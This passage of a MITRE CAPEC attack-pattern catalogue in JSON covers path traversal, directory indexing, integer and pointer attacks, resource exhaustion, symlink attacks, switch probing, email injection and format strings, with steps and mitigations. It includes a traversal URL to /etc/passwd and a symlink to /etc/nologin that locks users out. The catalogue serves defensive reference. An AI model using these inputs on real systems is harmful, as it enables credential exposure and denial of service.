overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Data","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Mitigations":{"Mitigation":["Design: Configure the access control correctly.","Design: Enforce principle of least privilege.","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach."]},"Example_Instances":{"Example":{"p":["An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request","From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system."],"div":["http://example/../../../../../etc/passwd",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"22"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"33","Entry_Name":"Path Traversal"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-9","Section":"Testing for Path Traversal (OWASP-AZ-001)"},{"External_Reference_ID":"REF-10","Section":"WASC-33 - Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Activation_Zone, Alternate_Terms, Architectural_Paradigms, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Examples-Instances, Frameworks, Injection_Vector, Languages, Payload, Payload_Activation_Impact, Platforms, Purposes, References, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Relevant_Security_Requirements, Solutions_and_Mitigations, Technical_Context, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"127":{"ID":"127","Name":"Directory Indexing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory\'s contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Directory Discovery] Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.","Technique":["Send requests to the web server for common directory names","If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.","Search for uncommon or potentially user created directories that may be present."]},{"Step":"2","Phase":"Experiment","Description":"[Iteratively explore directory/file structures] The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods","Technique":["Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.","Use a browser to manually explore the website by issuing a request ending the URL in a slash \'/\'.","Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.","Sequentially request a list of common base files to each directory discovered.","Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \\"/\\" request"]},{"Step":"3","Phase":"Exploit","Description":"[Read directories or files which are not intended for public viewing.] The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods","Technique":["Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \\"/\\" request","Try other known exploits to elevate privileges sufficient to bypass protected directories.","List the files in the directory by issuing a request with the URL ending in a \\"/\\" slash.","Access the files via direct URL and capture contents.","Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.","Sequentially request a list of common base files to each directory discovered."]}]},"Prerequisites":{"Prerequisite":["The target must be misconfigured to return a list of a directory\'s content when it receives a request that ends in a directory name rather than a file name.","The adversary must be able to control the path that is requested of the target.","The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.","The server version or patch level must not inherently prevent known directory listing attacks from working."]},"Skills_Required":{"Skill":["To issue the request to URL without given a specific file name",{"Level":"Low"},"To bypass the access control of the directory of listings",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP requests to a web application."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.","2. Preventing with .htaccess in Apache web server: In .htaccess, write \\"Options-indexes\\".","3. Suppressing error messages: using error 403 \\"Forbidden\\" message exactly like error 404 \\"Not Found\\" message."]},"Example_Instances":{"Example":{"p":["The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80","The target application does not have direct hyperlink to the \\"backup\\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \\"db_dump.php\\" file in it. This sensitive data should not be disclosed publicly."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"424"},{"CWE_ID":"425"},{"CWE_ID":"288"},{"CWE_ID":"285"},{"CWE_ID":"732"},{"CWE_ID":"276"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1083","Entry_Name":"File and Directory Discovery"}},"References":{"Reference":{"External_Reference_ID":"REF-11","Section":"WASC-16 - Directory Indexing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Examples-Instances, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"128":{"ID":"128","Name":"Integer Attacks","Abstraction":"Standard","Status":"Draft","Description":"An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"153"}},"Prerequisites":{"Prerequisite":["The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.","The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"682"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"129":{"ID":"129","Name":"Pointer Manipulation","Abstraction":"Meta","Status":"Draft","Description":"This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target application must have a pointer variable that the attacker can influence to hold an arbitrary value."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"682"},{"CWE_ID":"822"},{"CWE_ID":"823"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Pointer Attack",{"Date":"2017-01-09"}]}},"130":{"ID":"130","Name":"Excessive Allocation","Abstraction":"Meta","Status":"Stable","Description":"An adversary causes the target to allocate excessive resources to servicing the attackers\' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service."}},"Mitigations":{"Mitigation":["Limit the amount of resources that are accessible to unprivileged users.","Assume all input is malicious. Consider all potentially relevant properties when validating input.","Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.","Use resource-limiting settings, if possible."]},"Example_Instances":{"Example":"In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"404"},{"CWE_ID":"770"},{"CWE_ID":"1325"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.003","Entry_Name":"Endpoint Denial of Service:Application Exhaustion Flood"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"}]}},"131":{"ID":"131","Name":"Resource Leak Exposure","Abstraction":"Meta","Status":"Stable","Description":"An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target\'s performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must have a resource leak that the adversary can repeatedly trigger."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful resource leak exposure attack compromises the availability of the target system\'s services."}},"Mitigations":{"Mitigation":["If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).","Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)","Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"404"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499","Entry_Name":"Endpoint Denial of Service"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"132":{"ID":"132","Name":"Symlink Attack","Abstraction":"Detailed","Status":"Draft","Description":"An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link\'s endpoint, assuming that it is accessing a file with the link\'s name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify Target] Attacker identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.","Technique":["The attacker writes to files in different directories to check whether the application has sufficient checking before file operations.","The attacker creates symlinks to files in different directories."]},{"Step":"2","Phase":"Experiment","Description":"[Try to create symlinks to different files] The attacker then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.","Technique":["The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \\"sleep(2)\\" and \\"usleep()\\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.","The attacker may need a little guesswork on the filenames on which the target application would operate.","The attacker tries to create symlinks to the various filenames."]},{"Step":"3","Phase":"Exploit","Description":"[Target application operates on created symlinks to sensitive files] The attacker is able to create symlinks to sensitive files while the target application is operating on the file.","Technique":"Create the symlink to the sensitive file such as configuration files, etc."}]},"Prerequisites":{"Prerequisite":"The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The attacker must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear."},"Skills_Required":{"Skill":["To create symlinks",{"Level":"Low"},"To identify the files and create the symlinks during the file operation time window",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.","Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions."]},"Example_Instances":{"Example":{"p":["The attacker creates a symlink with the \\"same\\" name as the file which the application is intending to write to. The application will write to the file- \\"causing the data to be written where the symlink is pointing\\". An attack like this can be demonstrated as follows:","In the above example, the root user ran a program with poorly written file handling routines, providing the filename \\"myFile\\" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of \\"root\\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login."],"div":["root# vulprog myFile",{"style":"margin-left:10px;","class":"informative","div":[{"i":"{...program does some processing...]"},{"i":"[...program writes to \'myFile\', which points to /etc/nologin...]"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"59"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.009","Entry_Name":"Boot or Logon Autostart Execution:Shortcut Modification"}},"References":{"Reference":{"External_Reference_ID":"REF-13"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"133":{"ID":"133","Name":"Try All Common Switches","Abstraction":"Standard","Status":"Draft","Description":"An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application] Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.","Technique":["Search via internet for known, published applications that allow option switches.","Use automated tools to scan known ports to identify applications that might be accessible"]},{"Step":"2","Phase":"Explore","Description":"[Authenticate to application] Authenticate to the application, if required, in order to explore it.","Technique":["Use published credentials to access system.","Find unpublished credentails to access service.","Use other attack pattern or weakness to bypass authentication."]},{"Step":"3","Phase":"Experiment","Description":"[Try all common switches] Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.","Technique":["Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.","Use automated tools to run the application with common switches and observe the output"]},{"Step":"4","Phase":"Exploit","Description":"[Use sensitive processing or configuration information] Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application","Technique":"Using application information, formulate an attack on the application"}]},"Prerequisites":{"Prerequisite":"The attacker must be able to control the options or switches sent to the target."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target."},"Mitigations":{"Mitigation":["Design: Minimize switch and option functionality to only that necessary for correct function of the command.","Implementation: Remove all debug and testing options from production code."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"912"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Try All Common Application Switches and Options",{"Date":"2015-12-07"}]}},"134":{"ID":"134","Name":"Email Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \\"share this site with a friend\\" where the user provides the recipient\'s email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.","The adversary must have the ability to access the target mail application."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"150"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"30","Entry_Name":"Mail Command Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"135":{"ID":"135","Name":"Format String Injection","Abstraction":"Standard","Status":"Draft","Description":"An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The adversary takes an inventory of the entry points of the application.","Technique":["Spider web sites for all available links","List parameters, external variables, configuration files variables, etc. that are possibly used by the application."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to format string injection] Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.","Technique":"Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters."},{"Step":"3","Phase":"Exploit","Description":"[Try to exploit the Format String Injection vulnerability] After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.","Technique":"Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc."}]},"Prerequisites":{"Prerequisite":"The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters."},"Skills_Required":{"Skill":["In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Limit the usage of formatting string functions.","Strong input validation - All user-controllable input must be validated and filtered for 